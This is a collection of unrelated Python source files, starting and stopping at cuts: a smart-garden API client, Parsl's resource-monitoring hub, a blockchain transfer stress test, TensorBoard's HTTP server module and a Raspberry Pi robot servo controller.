client_id=self.client_id,
)
def quit(self):
if self.client:
self.client.should_stop = True
if self.ws:
self.ws.close()
if self.oauth_session:
self.oauth_session.delete(
f'{self.AUTHENTICATION_HOST}/v1/token/{self.token["refresh_token"]}',
headers={"X-Api-Key": self.client_id},
)
self.oauth_session.delete(
f'{self.AUTHENTICATION_HOST}/v1/token/{self.token["access_token"]}',
headers={"X-Api-Key": self.client_id},
)
def set_ws_status(self, status):
self.is_ws_connected = status
if self.ws_status_callback:
self.ws_status_callback(status)
def token_saver(self, token):
self.token = token
def call_smart_system_service(self, service_id, data):
args = {"data": data}
headers = self.create_header(True)
r = self.oauth_session.put(
f"{self.SMART_HOST}/v1/command/{service_id}",
headers=headers,
data=json.dumps(args, ensure_ascii=False),
)
if r.status_code != 202:
response = r.json()
raise Exception(f"{r.status_code} : {response['errors'][0]['title']}")
def __response_has_errors(self, response):
if response.status_code not in (200, 202):
try:
r = response.json()
if 'errors' in r:
msg = "{r['errors'][0]['title']} - {r['errors'][0]['detail']}"
elif 'message' in r:
msg = f"{r['message']}"
if response.status_code == 403:
msg = f"{msg} (hint: did you 'Connect an API' in your Application?)"
else:
msg = f"{r}"
except JSONDecodeError:
msg = response.content
self.logger.error(f"{response.status_code} : {msg}")
if response.status_code in (403, 429):
raise Exception(msg)
elif response.status_code == 401:
raise AuthenticationException(msg)
return True
return False
def __call_smart_system_get(self, url):
response = self.oauth_session.get(url, headers=self.create_header())
if self.__response_has_errors(response):
return None
return json.loads(response.content.decode("utf-8"))
@contextmanager
def __set_retry_on_session(
self,
backoff_factor=0.3,
status_forcelist=(500, 502, 504),
):
try:
retry = Retry(
total=None,
read=None,
connect=None,
status=None,
method_whitelist=False,
backoff_factor=backoff_factor,
status_forcelist=status_forcelist,
)
adapter = HTTPAdapter(max_retries=retry)
self.oauth_session.mount('http://', adapter)
self.oauth_session.mount('https://', adapter)
yield self.oauth_session
finally:
self.oauth_session.mount('http://', HTTPAdapter())
self.oauth_session.mount('https://', HTTPAdapter())
def update_locations(self):
response_data = self.__call_smart_system_get(f"{self.SMART_HOST}/v1/locations")
if response_data is not None:
if 'data' not in response_data or len(response_data["data"]) < 1:
self.logger.error("No locations found....")
else:
self.locations = {}
for location in response_data["data"]:
new_location = Location(self, location)
new_location.update_location_data(location)
self.locations[new_location.id] = new_location
def update_devices(self, location):
response_data = self.__call_smart_system_get(
f"{self.SMART_HOST}/v1/locations/{location.id}"
)
if response_data is not None:
# TODO : test if key exists
if len(response_data["data"]["relationships"]["devices"]["data"]) < 1:
self.logger.error("No device found....")
else:
devices_smart_system = {}
self.logger.debug(f'Received devices in message')
self.logger.debug("------- Beginning of message ---------")
self.logger.debug(response_data["included"])
for device in response_data["included"]:
real_id = device["id"].split(":")[0]
if real_id not in devices_smart_system:
devices_smart_system[real_id] = {}
if device["type"] in self.supported_services:
if device["type"] not in devices_smart_system[real_id]:
devices_smart_system[real_id][device["type"]] = []
devices_smart_system[real_id][device["type"]].append(device)
for parsed_device in devices_smart_system.values():
device_obj = DeviceFactory.build(location, parsed_device)
if device_obj is not None:
location.add_device(device_obj)
def start_ws(self, location):
args = {
"data": {
"type": "WEBSOCKET",
"attributes": {"locationId": location.id},
"id": "does-not-matter",
}
}
with self.__set_retry_on_session() as session:
r = session.post(
f"{self.SMART_HOST}/v1/websocket",
headers=self.create_header(True),
data=json.dumps(args, ensure_ascii=False),
)
r.raise_for_status()
response = r.json()
ws_url = response["data"]["attributes"]["url"]
if self.client is None:
self.client = Client(self, level=self.level, location=location)
if self.level == logging.DEBUG:
websocket.enableTrace(True)
self.ws = websocket.WebSocketApp(
ws_url,
on_message=self.client.on_message,
on_error=self.client.on_error,
on_close=self.client.on_close,
on_open=self.client.on_open,
)
wst = Thread(
target=self.ws.run_forever, kwargs={"ping_interval": 60, "ping_timeout": 5}
)
wst.daemon = True
wst.start()
def on_message(self, message):
data = json.loads(message)
self.logger.debug(f'Received {data["type"]} message')
self.logger.debug("------- Beginning of message ---------")
self.logger.debug(message)
if data["type"] == "LOCATION":
self.logger.debug(">>>>>>>>>>>>> Found LOCATION")
self.parse_location(data)
elif data["type"] in self.supported_services:
self.parse_device(data)
else:
self.logger.debug(">>>>>>>>>>>>> Unkonwn Message")
self.logger.debug("------- End of message ---------")
def parse_location(self, location):
if location["id"] not in self.locations:
self.logger.debug(f"Location not found : {location['attributes']['name']}")
self.locations[location["id"]].update_location_data(location)
def parse_device(self, device):
device_id = device["id"].split(":")[0]
for location in self.locations.values():
if device_id in location.devices:
location.devices[device_id].update_data(device)
break
def add_ws_status_callback(self, callback):
self.ws_status_callback = callback
|
monitoring.py
|
import os
import socket
import pickle
import logging
import time
import datetime
import zmq
import queue
from multiprocessing import Process, Queue
from parsl.utils import RepresentationMixin
from parsl.monitoring.message_type import MessageType
from typing import Optional
try:
from parsl.monitoring.db_manager import dbm_starter
except Exception as e:
_db_manager_excepts = e # type: Optional[Exception]
else:
_db_manager_excepts = None
def start_file_logger(filename, name='monitoring', level=logging.DEBUG, format_string=None):
"""Add a stream log handler.
Parameters
---------
filename: string
Name of the file to write logs to. Required.
name: string
Logger name. Default="parsl.executors.interchange"
level: logging.LEVEL
Set the logging level. Default=logging.DEBUG
- format_string (string): Set the format string
format_string: string
Format string to use.
Returns
-------
None.
"""
if format_string is None:
format_string = "%(asctime)s.%(msecs)03d %(name)s:%(lineno)d [%(levelname)s] %(message)s"
logger = logging.getLogger(name)
logger.setLevel(level)
handler = logging.FileHandler(filename)
handler.setLevel(level)
formatter = logging.Formatter(format_string, datefmt='%Y-%m-%d %H:%M:%S')
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
class UDPRadio(object):
def __init__(self, monitoring_url, source_id=None, timeout=10):
"""
Parameters
----------
monitoring_url : str
URL of the form <scheme>://<IP>:<PORT>
message : py obj
Python object to send, this will be pickled
source_id : str
String identifier of the source
timeout : int
timeout, default=10s
"""
self.monitoring_url = monitoring_url
self.sock_timeout = timeout
self.source_id = source_id
try:
self.scheme, self.ip, port = (x.strip('/') for x in monitoring_url.split(':'))
self.port = int(port)
except Exception:
raise Exception("Failed to parse monitoring url: {}".format(monitoring_url))
self.sock = socket.socket(socket.AF_INET,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP) # UDP
self.sock.settimeout(self.sock_timeout)
def send(self, message_type, task_id, message):
""" Sends a message to the UDP receiver
Parameter
---------
message_type: monitoring.MessageType (enum)
In this case message type is RESOURCE_INFO most often
task_id: int
Task identifier of the task for which resource monitoring is being reported
message: object
Arbitrary pickle-able object that is to be sent
Returns:
# bytes sent,
or False if there was a timeout during send,
or None if there was an exception during pickling
"""
x = 0
try:
buffer = pickle.dumps((self.source_id, # Identifier for manager
int(time.time()), # epoch timestamp
message_type,
message))
except Exception:
logging.exception("Exception during pickling", exc_info=True)
return
try:
x = self.sock.sendto(buffer, (self.ip, self.port))
except socket.timeout:
logging.error("Could not send message within timeout limit")
return False
return x
def __del__(self):
self.sock.close()
class MonitoringHub(RepresentationMixin):
def __init__(self,
hub_address,
hub_port=None,
hub_port_range=(55050, 56000),
client_address="127.0.0.1",
client_port_range=(55000, 56000),
workflow_name=None,
workflow_version=None,
logging_endpoint='sqlite:///monitoring.db',
logdir=None,
logging_level=logging.INFO,
resource_monitoring_enabled=True,
resource_monitoring_interval=30): # in seconds
"""
Parameters
----------
hub_address : str
The ip address at which the workers will be able to reach the Hub. Default: "127.0.0.1"
hub_port : int
The specific port at which workers will be able to reach the Hub via UDP. Default: None
hub_port_range : tuple(int, int)
The MonitoringHub picks ports at random from the range which will be used by Hub.
This is overridden when the hub_port option is set. Defauls: (55050, 56000)
client_address : str
The ip address at which the dfk will be able to reach Hub. Default: "127.0.0.1"
client_port_range : tuple(int, int)
The MonitoringHub picks ports at random from the range which will be used by Hub.
Defauls: (55050, 56000)
workflow_name : str
The name for the workflow. Default to the name of the parsl script
workflow_version : str
The version of the workflow. Default to the beginning datetime of the parsl script
logging_endpoint : str
The database connection url for monitoring to log the information.
These URLs follow RFC-1738, and can include username, password, hostname, database name.
Default: 'sqlite:///monitoring.db'
logdir : str
Parsl log directory paths. Logs and temp files go here. Default: '.'
logging_level : int
Logging level as defined in the logging module. Default: logging.INFO (20)
resource_monitoring_enabled : boolean
Set this field to True to enable logging the info of resource usage of each task. Default: True
resource_monitoring_interval : int
The time interval at which the monitoring records the resource usage of each task. Default: 30 seconds
"""
self.logger = None
self._dfk_channel = None
if _db_manager_excepts:
raise(_db_manager_excepts)
self.client_address = client_address
self.client_port_range = client_port_range
self.hub_address = hub_address
self.hub_port = hub_port
self.hub_port_range = hub_port_range
self.logging_endpoint = logging_endpoint
self.logdir = logdir
self.logging_level = logging_level
self.workflow_name = workflow_name
self.workflow_version = workflow_version
self.resource_monitoring_enabled = resource_monitoring_enabled
self.resource_monitoring_interval = resource_monitoring_interval
def start(self, run_id):
if self.logdir is None:
self.logdir = "."
try:
os.makedirs(self.logdir)
except FileExistsError:
pass
# Initialize the ZMQ pipe to the Parsl Client
self.logger = start_file_logger("{}/monitoring_hub.log".format(self.logdir),
name="monitoring_hub",
level=self.logging_level)
self.logger.info("Monitoring Hub initialized")
self.logger.debug("Initializing ZMQ Pipes to client")
self.monitoring_hub_active = True
self._context = zmq.Context()
self._dfk_channel = self._context.socket(zmq.DEALER)
self._dfk_channel.set_hwm(0)
self.dfk_port = self._dfk_channel.bind_to_random_port("tcp://{}".format(self.client_address),
min_port=self.client_port_range[0],
max_port=self.client_port_range[1])
comm_q = Queue(maxsize=10)
self.stop_q = Queue(maxsize=10)
self.priority_msgs = Queue()
self.resource_msgs = Queue()
self.node_msgs = Queue()
self.queue_proc = Process(target=hub_starter,
args=(comm_q, self.priority_msgs, self.node_msgs, self.resource_msgs, self.stop_q),
kwargs={"hub_address": self.hub_address,
"hub_port": self.hub_port,
"hub_port_range": self.hub_port_range,
"client_address": self.client_address,
"client_port": self.dfk_port,
"logdir": self.logdir,
"logging_level": self.logging_level,
"run_id": run_id
},
)
self.queue_proc.start()
self.dbm_proc = Process(target=dbm_starter,
args=(self.priority_msgs, self.node_msgs, self.resource_msgs,),
kwargs={"logdir": self.logdir,
"logging_level": self.logging_level,
"db_url": self.logging_endpoint,
},
)
self.dbm_proc.start()
try:
udp_dish_port, ic_port = comm_q.get(block=True, timeout=120)
except queue.Empty:
self.logger.error("Hub has not completed initialization in 120s. Aborting")
raise Exception("Hub failed to start")
self.monitoring_hub_url = "udp://{}:{}".format(self.hub_address, udp_dish_port)
return ic_port
def send(self, mtype, message):
self.logger.debug("Sending message {}, {}".format(mtype, message))
return self._dfk_channel.send_pyobj((mtype, message))
def close(self):
if self.logger:
self.logger.info("Terminating Monitoring Hub")
if self._dfk_channel and self.monitoring_hub_active:
self.monitoring_hub_active = False
self._dfk_channel.close()
self.logger.info("Waiting for Hub to receive all messages and terminate")
try:
msg = self.stop_q.get()
self.logger.info("Received {} from Hub".format(msg))
except queue.Empty:
pass
self.logger.info("Terminating Hub")
self.queue_proc.terminate()
self.priority_msgs.put(("STOP", 0))
def __del__(self):
self.close()
@staticmethod
def monitor_wrapper(f, task_id, monitoring_hub_url, run_id, sleep_dur):
""" Internal
Wrap the Parsl app with a function that will call the monitor function and point it at the correct pid when the task begins.
"""
def wrapped(*args, **kwargs):
p = Process(target=monitor, args=(os.getpid(), task_id, monitoring_hub_url, run_id, sleep_dur))
p.start()
try:
return f(*args, **kwargs)
finally:
# There's a chance of zombification if the workers are killed by some signals
p.terminate()
p.join()
return wrapped
class Hub(object):
def __init__(self,
hub_address,
hub_port=None,
hub_port_range=(55050, 56000),
client_address="127.0.0.1",
client_port=None,
monitoring_hub_address="127.0.0.1",
logdir=".",
run_id=None,
logging_level=logging.DEBUG,
atexit_timeout=3 # in seconds
):
""" Initializes a monitoring configuration class.
Parameters
----------
hub_address : str
The ip address at which the workers will be able to reach the Hub. Default: "127.0.0.1"
hub_port : int
The specific port at which workers will be able to reach the Hub via UDP. Default: None
hub_port_range : tuple(int, int)
The MonitoringHub picks ports at random from the range which will be used by Hub.
This is overridden when the hub_port option is set. Defauls: (55050, 56000)
client_address : str
The ip address at which the dfk will be able to reach Hub. Default: "127.0.0.1"
client_port : tuple(int, int)
The port at which the dfk will be able to reach Hub. Defauls: None
logdir : str
Parsl log directory paths. Logs and temp files go here. Default: '.'
logging_level : int
Logging level as defined in the logging module. Default: logging.INFO (20)
atexit_timeout : float, optional
The amount of time in seconds to terminate the hub without receiving any messages, after the last dfk workflow message is received.
"""
try:
os.makedirs(logdir)
except FileExistsError:
pass
self.logger = start_file_logger("{}/hub.log".format(logdir),
name="hub",
level=logging_level)
self.logger.debug("Hub starting")
self.hub_port = hub_port
self.hub_address = hub_address
self.atexit_timeout = atexit_timeout
self.run_id = run_id
self.loop_freq = 10.0 # milliseconds
# Initialize the UDP socket
try:
self.sock = socket.socket(socket.AF_INET,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP)
# We are trying to bind to all interfaces with 0.0.0.0
if not self.hub_port:
self.sock.bind(('0.0.0.0', 0))
self.hub_port = self.sock.getsockname()[1]
else:
self.sock.bind(('0.0.0.0', self.hub_port))
self.sock.settimeout(self.loop_freq / 1000)
self.logger.info("Initialized the UDP socket on 0.0.0.0:{}".format(self.hub_port))
except OSError:
self.logger.critical("The port is already in use")
self.hub_port = -1
self._context = zmq.Context()
self.dfk_channel = self._context.socket(zmq.DEALER)
self.dfk_channel.set_hwm(0)
self.dfk_channel.RCVTIMEO = int(self.loop_freq) # in milliseconds
self.dfk_channel.connect("tcp://{}:{}".format(client_address, client_port))
self.ic_channel = self._context.socket(zmq.DEALER)
self.ic_channel.set_hwm(0)
self.ic_channel.RCVTIMEO = int(self.loop_freq) # in milliseconds
self.logger.debug("hub_address: {}. hub_port_range {}".format(hub_address, hub_port_range))
self.ic_port = self.ic_channel.bind_to_random_port("tcp://*",
min_port=hub_port_range[0],
max_port=hub_port_range[1])
def start(self, priority_msgs, node_msgs, resource_msgs, stop_q):
while True:
try:
data, addr = self.sock.recvfrom(2048)
msg = pickle.loads(data)
resource_msgs.put((msg, addr))
self.logger.debug("Got UDP Message from {}: {}".format(addr, msg))
except socket.timeout:
pass
try:
msg = self.dfk_channel.recv_pyobj()
self.logger.debug("Got ZMQ Message from DFK: {}".format(msg))
priority_msgs.put((msg, 0))
if msg[0].value == MessageType.WORKFLOW_INFO.value and 'python_version' not in msg[1]:
break
except zmq.Again:
pass
try:
msg = self.ic_channel.recv_pyobj()
msg[1]['run_id'] = self.run_id
msg = (msg[0], msg[1])
self.logger.debug("Got ZMQ Message from interchange: {}".format(msg))
node_msgs.put((msg, 0))
except zmq.Again:
pass
last_msg_received_time = time.time()
while time.time() - last_msg_received_time < self.atexit_timeout:
try:
data, addr = self.sock.recvfrom(2048)
msg = pickle.loads(data)
resource_msgs.put((msg, addr))
last_msg_received_time = time.time()
self.logger.debug("Got UDP Message from {}: {}".format(addr, msg))
except socket.timeout:
pass
stop_q.put("STOP")
def hub_starter(comm_q, priority_msgs, node_msgs, resource_msgs, stop_q, *args, **kwargs):
hub = Hub(*args, **kwargs)
comm_q.put((hub.hub_port, hub.ic_port))
hub.start(priority_msgs, node_msgs, resource_msgs, stop_q)
def monitor(pid, task_id, monitoring_hub_url, run_id, sleep_dur=10):
"""Internal
Monitors the Parsl task's resources by pointing psutil to the task's pid and watching it and its children.
"""
import psutil
import platform
import logging
import time
format_string = "%(asctime)s.%(msecs)03d %(name)s:%(lineno)d [%(levelname)s] %(message)s"
logging.basicConfig(filename='{logbase}/monitor.{task_id}.{pid}.log'.format(
logbase="/tmp", task_id=task_id, pid=pid), level=logging.DEBUG, format=format_string)
logging.debug("start of monitor")
radio = UDPRadio(monitoring_hub_url,
source_id=task_id)
# these values are simple to log. Other information is available in special formats such as memory below.
simple = ["cpu_num", 'cpu_percent', 'create_time', 'cwd', 'exe', 'memory_percent', 'nice', 'name', 'num_threads', 'pid', 'ppid', 'status', 'username']
# values that can be summed up to see total resources used by task process and its children
summable_values = ['cpu_percent', 'memory_percent', 'num_threads']
pm = psutil.Process(pid)
pm.cpu_percent()
first_msg = True
children_user_time = {}
children_system_time = {}
total_children_user_time = 0.0
total_children_system_time = 0.0
while True:
logging.debug("start of monitoring loop")
try:
d = {"psutil_process_" + str(k): v for k, v in pm.as_dict().items() if k in simple}
d["run_id"] = run_id
d["task_id"] = task_id
d['resource_monitoring_interval'] = sleep_dur
d['hostname'] = platform.node()
d['first_msg'] = first_msg
d['timestamp'] = datetime.datetime.now()
logging.debug("getting children")
children = pm.children(recursive=True)
logging.debug("got children")
d["psutil_cpu_count"] = psutil.cpu_count()
d['psutil_process_memory_virtual'] = pm.memory_info().vms
d['psutil_process_memory_resident'] = pm.memory_info().rss
d['psutil_process_time_user'] = pm.cpu_times().user
d['psutil_process_time_system'] = pm.cpu_times().system
d['psutil_process_children_count'] = len(children)
try:
d['psutil_process_disk_write'] = pm.io_counters().write_bytes
d['psutil_process_disk_read'] = pm.io_counters().read_bytes
except Exception:
# occassionally pid temp files that hold this information are unvailable to be read so set to zero
logging.exception("Exception reading IO counters for main process. Recorded IO usage may be incomplete", exc_info=True)
d['psutil_process_disk_write'] = 0
d['psutil_process_disk_read'] = 0
for child in children:
for k, v in child.as_dict(attrs=summable_values).items():
d['psutil_process_' + str(k)] += v
child_user_time = child.cpu_times().user
child_system_time = child.cpu_times().system
total_children_user_time += child_user_time - children_user_time.get(child.pid, 0)
total_children_system_time += child_system_time - children_system_time.get(child.pid, 0)
children_user_time[child.pid] = child_user_time
children_system_time[child.pid] = child_system_time
d['psutil_process_memory_virtual'] += child.memory_info().vms
d['psutil_process_memory_resident'] += child.memory_info().rss
try:
d['psutil_process_disk_write'] += child.io_counters().write_bytes
d['psutil_process_disk_read'] += child.io_counters().read_bytes
except Exception:
# occassionally pid temp files that hold this information are unvailable to be read so add zero
logging.exception("Exception reading IO counters for child {k}. Recorded IO usage may be incomplete".format(k=k), exc_info=True)
d['psutil_process_disk_write'] += 0
d['psutil_process_disk_read'] += 0
d['psutil_process_time_user'] += total_children_user_time
d['psutil_process_time_system'] += total_children_system_time
logging.debug("sending message")
radio.send(MessageType.TASK_INFO, task_id, d)
first_msg = False
except Exception:
logging.exception("Exception getting the resource usage. Not sending usage to Hub", exc_info=True)
logging.debug("sleeping")
time.sleep(sleep_dur)
|
p2p_stress.py
|
import testUtils
import p2p_test_peers
import random
import time
import copy
import threading
from core_symbol import CORE_SYMBOL
class StressNetwork:
speeds=[1,5,10,30,60,100,500]
sec=10
maxthreads=100
trList=[]
def maxIndex(self):
return len(self.speeds)
def randAcctName(self):
s=""
for i in range(12):
s=s+random.choice("abcdefghijklmnopqrstuvwxyz12345")
return s
def _transfer(self, node, acc1, acc2, amount, threadId, round):
memo="%d %d" % (threadId, round)
tr = node.transferFunds(acc1, acc2, amount, memo)
self.trList.append(tr)
def execute(self, cmdInd, node, ta, eosio):
print("\n==== network stress test: %d transaction(s)/s for %d secs ====" % (self.speeds[cmdInd], self.sec))
total = self.speeds[cmdInd] * self.sec
ta.name = self.randAcctName()
acc1 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eosio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
ta.name = self.randAcctName()
acc2 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eosio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
print("issue currency0000 into %s" % (acc1.name))
contract="cyber"
action="issue"
data="{\"to\":\"" + acc1.name + "\",\"quantity\":\"1000000.0000 "+CORE_SYMBOL+"\"}"
opts="--permission cyber@active"
tr=node.pushMessage(contract, action, data, opts)
trid = node.getTransId(tr[1])
if trid is None:
return ([], "", 0.0, "failed to issue currency0000")
print("transaction id %s" % (trid))
node.waitForTransInBlock(trid)
self.trList = []
expBal = 0
nthreads=self.maxthreads
if nthreads > self.speeds[cmdInd]:
nthreads = self.speeds[cmdInd]
cycle = int(total / nthreads)
total = cycle * nthreads # rounding
delay = 1.0 / self.speeds[cmdInd] * nthreads
print("start currency0000 trasfer from %s to %s for %d times with %d threads" % (acc1.name, acc2.name, total, nthreads))
t00 = time.time()
for k in range(cycle):
t0 = time.time()
amount = 1
threadList = []
for m in range(nthreads):
th = threading.Thread(target = self._transfer,args = (node, acc1, acc2, amount, m, k))
th.start()
threadList.append(th)
for th in threadList:
th.join()
expBal = expBal + amount * nthreads
t1 = time.time()
if (t1-t0 < delay):
time.sleep(delay - (t1-t0))
t11 = time.time()
print("time used = %lf" % (t11 - t00))
actBal = node.getAccountBalance(acc2.name)
print("account %s: expect Balance:%d, actual Balance %d" % (acc2.name, expBal, actBal))
transIdlist = []
for tr in self.trList:
trid = node.getTransId(tr)
transIdlist.append(trid)
node.waitForTransInBlock(trid)
return (transIdlist, acc2.name, expBal, "")
def on_exit(self):
print("end of network stress tests")
|
server.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module for building TensorBoard servers.
This is its own module so it can be used in both actual code and test code.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import threading
import time
import six
from six.moves import BaseHTTPServer
from six.moves import socketserver
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import event_accumulator
from tensorflow.python.summary.impl import gcs
from tensorflow.tensorboard.backend import handler
# How many elements to store per tag, by tag type
TENSORBOARD_SIZE_GUIDANCE = {
event_accumulator.COMPRESSED_HISTOGRAMS: 500,
event_accumulator.IMAGES: 4,
event_accumulator.AUDIO: 4,
event_accumulator.SCALARS: 1000,
event_accumulator.HISTOGRAMS: 1,
}
def ParseEventFilesSpec(logdir):
"""Parses `logdir` into a map from paths to run group names.
The events files flag format is a comma-separated list of path specifications.
A path specification either looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a
spec with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir is None:
return files
for specification in logdir.split(','):
# If it's a gcs path, don't split on colon
if gcs.IsGCSPath(specification):
run_name = None
path = specification
# If the spec looks like /foo:bar/baz, then we assume it's a path with a
# colon.
elif ':' in specification and specification[0] != '/':
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if not os.path.isabs(path) and not gcs.IsGCSPath(path):
# Create absolute path out of relative one.
path = os.path.join(os.path.realpath('.'), path)
files[path] = run_name
return files
def ReloadMultiplexer(multiplexer, path_to_run):
"""Loads all runs into the multiplexer.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
"""
start = time.time()
for (path, name) in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
multiplexer.Reload()
duration = time.time() - start
logging.info('Multiplexer done loading. Load took %0.1f secs', duration)
def StartMultiplexerReloadingThread(multiplexer, path_to_run, load_interval):
"""Starts a thread to automatically reload the given multiplexer.
The thread will reload the multiplexer by calling `ReloadMultiplexer` every
`load_interval` seconds, starting immediately.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: How many seconds to wait after one load before starting the
next load.
Returns:
A started `threading.Thread` that reloads the multiplexer.
"""
# We don't call multiplexer.Reload() here because that would make
# AddRunsFromDirectory block until the runs have all loaded.
for path in path_to_run.keys():
if gcs.IsGCSPath(path):
gcs.CheckIsSupported()
logging.info(
'Assuming %s is intended to be a Google Cloud Storage path because '
'it starts with %s. If it isn\'t, prefix it with \'/.\' (i.e., use '
'/.%s instead)', path, gcs.PATH_PREFIX, path)
def _ReloadForever():
while True:
ReloadMultiplexer(multiplexer, path_to_run)
time.sleep(load_interval)
thread = threading.Thread(target=_ReloadForever)
thread.daemon = True
thread.start()
return thread
class ThreadedHTTPServer(socketserver.ThreadingMixIn,
BaseHTTPServer.HTTPServer):
"""A threaded HTTP server."""
daemon = True
def BuildServer(multiplexer, host, port):
"""Sets up an HTTP server for running TensorBoard.
Args:
multiplexer: An `EventMultiplexer` that the server will query for
information about events.
host: The host name.
port: The port number to bind to, or 0 to pick one automatically.
Returns:
A `BaseHTTPServer.HTTPServer`.
"""
factory = functools.partial(handler.TensorboardHandler, multiplexer)
return ThreadedHTTPServer((host, port), factory)
|
moveGoogle.py
|
#!/usr/bin/env python
import os
import os.path
import yaml
import time
import random
import multiprocessing
import RPi.GPIO as GPIO
from talk import say
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
from adafruit_servokit import ServoKit
Motor1 = {'EN': 27, 'input1': 19, 'input2': 16}
Motor2 = {'EN': 22, 'input1': 26, 'input2': 20}
for x in Motor1:
GPIO.setup(Motor1[x], GPIO.OUT)
GPIO.setup(Motor2[x], GPIO.OUT)
EN1 = GPIO.PWM(Motor1['EN'], 100)
EN2 = GPIO.PWM(Motor2['EN'], 100)
EN1.start(0)
EN2.start(0)
hand = ServoKit(channels=16)
ROOT_PATH = os.path.realpath(os.path.join(__file__, '..', '..'))
def readYaml():
with open('{}/src/configuration.yaml'.format(ROOT_PATH),'r+', encoding='utf8') as conf:
servo = yaml.load(conf, Loader=yaml.FullLoader)
return servo
def writeYaml(s=None):
with open('{}/src/configuration.yaml'.format(ROOT_PATH),'w', encoding='utf8') as conf:
if s==None:
yaml.dump(servo,conf)
else:
yaml.dump(s,conf)
servo = readYaml()
if servo == None:
with open('{}/src/configurationBackUp.yaml'.format(ROOT_PATH),'r+', encoding='utf8') as conf:
servoBackUp = yaml.load(conf, Loader=yaml.FullLoader)
writeYaml(servoBackUp)
servo = readYaml()
if servo == None:
print('close')
exit()
Initial = servo['Initial_Position']['I2C']
Current = servo['Current_Position']['I2C']
InitialGpio = servo['Initial_Position']['Gpio']
CurrentGpio = servo['Current_Position']['Gpio']
GpioPin = servo['Pin']['Gpio']
for i in range(0,6):
GPIO.setup(GpioPin[i], GPIO.OUT)
Servo = []
for i in range(0,6):
Servo.append(GPIO.PWM(GpioPin[i],50))
Servo[i].start(0)
def changeDegree(pin,newDegree,time1=0.05,update=5):
maxChange = 0
pinSize = len(pin)
for i in range(0,pinSize):
maxChange = max(abs(Current[pin[i]]-newDegree[i]),maxChange)
for deg in range(0,maxChange,update):
for i in range(0,pinSize):
if Current[pin[i]]<newDegree[i]:
Current[pin[i]] += update
elif Current[pin[i]]>newDegree[i]:
Current[pin[i]] -= update
for i in range(0,pinSize):
hand.servo[pin[i]].angle = Current[pin[i]]
servo['Current_Position']['I2C'][pin[i]] = Current[pin[i]]
writeYaml()
time.sleep(time1)
def takePosition():
changeDegree([7,8],[180,0])
changeDegree([0,1,2,3,4,5,6,7,8,9,10,11],[0,50,130,0,170,170,0,180,0,60,150,0])
def changeDegreeGpio(pin,degree,update,duration):
pinSize = len(pin)
for i in range(0,pinSize):
p = pin[i]
if CurrentGpio[p]>degree[i]:
update = -update
for deg in range(CurrentGpio[p],degree[i],update):
duty = deg/18
duty+=2
Servo[p].ChangeDutyCycle(duty)
time.sleep(duration)
CurrentGpio[p]=degree[i]
writeYaml()
def Run(a, b, c, d, x):
GPIO.output(Motor1['input1'], GPIO.LOW)
GPIO.output(Motor1['input2'], GPIO.LOW)
GPIO.output(Motor2['input1'], GPIO.LOW)
GPIO.output(Motor2['input2'], GPIO.LOW)
if a==1:
GPIO.output(Motor1['input1'], GPIO.HIGH)
if b==1:
GPIO.output(Motor1['input2'], GPIO.HIGH)
if c==1:
GPIO.output(Motor2['input1'], GPIO.HIGH)
if d==1:
GPIO.output(Motor2['input2'], GPIO.HIGH)
EN2.ChangeDutyCycle(x)
EN1.ChangeDutyCycle(x)
def Stop():
Run(0,0,0,0,0)
def Start_Slow(a, b, c, d):
for i in range(0,100,20):
Run(a,b,c,d,i)
time.sleep(0.5)
def Stop_Slow(a,b,c,d):
for i in range(100,0,-20):
Run(a,b,c,d,i)
time.sleep(0.5)
def yes(times=3):
for i in range(0,times):
changeDegree([0],[30])
time.sleep(0.08)
changeDegree([0],[0])
time.sleep(0.08)
def no(times=3):
for i in range(0,times):
changeDegree([15],[70],5,0.05)
time.sleep(0.2)
changeDegree([15],[110],5,0.05)
time.sleep(0.2)
changeDegree([15],[90],5,0.05)
def move_head(times=3):
for i in range(0,times):
changeDegree([0],[20])
changeDegreeGpio([0],[80],5,0.05)
changeDegree([0],[0])
changeDegreeGpio([0],[100],5,0.05)
changeDegreeGpio([0],[90],10,0.01)
def random0():
r = random.randrange(1,10000000)%3
if(r==1):
changeDegree([0],[20])
changeDegree([0],[0])
elif(r==2):
changeDegreeGpio([0],[120],5,0.05)
changeDegreeGpio([0],[90],5,0.05)
else:
changeDegreeGpio([0],[60],5,0.05)
changeDegreeGpio([0],[90],5,0.05)
def random1():
